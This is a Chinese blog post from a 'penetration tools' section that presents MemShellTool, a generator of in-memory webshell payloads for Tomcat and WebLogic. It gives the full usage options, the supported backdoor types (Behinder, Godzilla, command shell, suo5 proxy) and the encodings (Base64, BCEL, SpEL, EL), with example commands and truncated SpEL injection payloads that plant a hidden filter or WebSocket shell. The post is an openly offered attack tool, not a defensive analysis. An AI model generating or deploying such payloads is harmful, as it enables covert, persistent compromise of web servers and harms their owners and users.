登录
注册
首页 渗透工具 正文
  • 本文约2043字,阅读需10分钟
  • 214
  • 0

MemShellTool

内存马payload生成工具

0x00

  • 一键生成内存马payload
  • 支持多种类型webshell、代理工具
  • 多种编码方式
  • 应对特殊环境下的payload长度限制,支持通过加载器分离加载
  • 完善中......

0x01

use

usage: java -jar MemShellTool.jar [-ct <arg>] [-d] [-h] [-hn <arg>] [-icn
       <arg>] [-it <arg>] [-k <arg>] [-op <arg>] [-ot <arg>] [-p <arg>]
       [-slt <arg>] [-sname <arg>] [-st <arg>] [-u <arg>]
 -ct,--containerType <arg>       ContainerType: Tomcat,Weblogic...
 -d,--default                    default option
 -h,--help                       print this message
 -hn,--headerName <arg>          access shell with header
 -icn,--injectClassName <arg>    loader name
 -it,--injectType <arg>          injectType: Single,Loader,ShellCode
 -k,--key <arg>                  shell key: GodZilla...need
 -op,--outPath <arg>             output path
 -ot,--outTpye <arg>             output type
 -p,--password <arg>             shell password
 -slt,--shellType <arg>          ServerType: CMD,Behinder...
 -sname,--shellClassName <arg>   shellClassName: xxxFilter
 -st,--serverType <arg>          ServerType: Filter,Valve,Servlet...
 -u,--shellPath <arg>            shell url: /shell

-------------------------

Available [InjectType]:
[SINGLE, LOADER, SHELLCODE]

-------------------------

Available [Container]:
[WEBLOGIC, TOMCAT]

-------------------------

Container [WEBLOGIC] Available ServerType:
[FILTER]
Container [TOMCAT] Available ServerType:
[FILTER, FILTER, SERVLET, VALVE, WEBSOCKET]

-------------------------

Server Type [FILTER] Available ShellType:
[BEHINDER, CMD, SUO5, GODZILLA]
Server Type [FILTER] Available ShellType:
[BEHINDER, CMD, SUO5, GODZILLA]
Server Type [SERVLET] Available ShellType:
[BEHINDER, CMD, GODZILLA]
Server Type [VALVE] Available ShellType:
[BEHINDER, CMD, GODZILLA]
Server Type [WEBSOCKET] Available ShellType:
[CMD]

-------------------------

Available OutTpye:
[RAW, BASE64, BCEL, JAVASCRIPT, SPEL, EL]

example:spel表达式 tomcat filter 哥斯拉内存马

java -jar MemShellTool-v1.0.jar -d -ct TOMCAT -sname Helper -st FILTER -u /404 -slt BEHINDER -ot SPEL

spel with JsEngine:
T(javax.script.ScriptEngineManager).newInstance().getEngineByName("js").eval('var co......
spel with Spring defineClass:
T(org.springframework.cglib.core.ReflectUtils).defineClass("inje......
     key             value
     -------         -------
     InjectType      SINGLE
     ServerType      FILTER
     ContainerType   TOMCAT
     ShellType       BEHINDER
     ShellClassName  Helper
     ShellPath       /404
     Password        1a1dc91c907325c6
     Key             key
     HeaderName      Accept-Header
     InjectClassName inject_dc58ad
     OutPath         ./
     OutTpye         SPEL

SPEL 注入 tomcat websocket内存马

java -jar MemShellTool-v1.0.jar -d -ct TOMCAT -sname Helper -st WEBSOCKET -u /ws -slt CMD -ot SPEL

注入shell

img1

连接shell

img2

温馨提示:本文最后更新于2024年8月8日 18:22,若内容或图片失效,请在下方留言或联系博主。
  • 本文作者:admins
  • 本文链接:http://caidaome.com/?post=644
  • 版权申明:除非特别说明,否则均为本站原创文章,转载或复制请注明出处。
评论
博主关闭了评论